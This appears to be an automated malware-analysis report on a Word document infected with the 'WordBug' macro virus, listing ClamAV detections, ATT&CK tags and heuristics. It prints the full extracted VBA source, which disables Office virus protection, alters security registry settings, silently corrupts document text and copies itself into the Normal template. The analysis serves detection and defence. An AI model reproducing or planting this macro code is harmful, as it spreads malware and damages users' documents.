MALICIOUS
248
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
This malicious Word document contains a legacy WordBasic macro and a VBA macro named 'WordBug' with an AutoClose subroutine. The macro attempts to disable security features, infect the Normal template and the active document by exporting and importing its code, and saves the document. It also attempts to set the document subject to 'WordBug'. The presence of 'Win.Trojan.Psycho-3' and 'Win.Trojan.wmvg-1' signatures strongly indicates a trojan dropper.
Heuristics 5
-
ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Psycho-3
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub AutoClose() -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1866 bytes |
SHA-256: 54ade780595fc139ada7532fb6c2b5810ab5800ffc484efc15d95d4fca2a379e |
|||
|
Detection
ClamAV:
Win.Trojan.wmvg-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "WordBug"
Sub AutoClose()
'WordBug Virus V1.00
'The WaLRuS 04/00
On Error Resume Next
Options.ConfirmConversions = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
ActiveDocument.ReadOnlyRecommended = False
Dim lngNumberOfWords As Long
Dim lngFirstIndex As Long, lngSecondIndex As Long
Dim strFirst As String, strSecond As String
lngNumberOfWords = ActiveDocument.ComputeStatistics(wdStatisticWords)
lngFirstIndex = Int(lngNumberOfWords * Rnd())
lngSecondIndex = Int(lngNumberOfWords * Rnd())
strFirst = ActiveDocument.Words(lngFirstIndex).Text
ActiveDocument.Words(lngSecondIndex).Text = strFirst
Set Norm = NormalTemplate.VBProject.VBComponents
Set Doc = ActiveDocument.VBProject.VBComponents
If Norm.Item("WordBug").Name <> "WordBug" Then
Doc("WordBug").Export "c:\WordBug.drv"
Set infect = NormalTemplate.VBProject
ElseIf Doc.Item("WordBug").Name <> "WordBug" Then
Norm("WordBug").Export "c:\WordBug.drv"
Set infect = ActiveDocument.VBProject
End If
With Dialogs(wdDialogFileSummaryInfo)
.Subject = "WordBug"
.Execute
End With
infect.VBComponents.Import ("c:\WordBug.drv")
Kill ("c:\WordBug.drv")
ActiveDocument.Save
End Sub
Sub ToolsMacro(): End Sub
Sub FileTemplates(): End Sub
Sub ViewVBCode(): End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.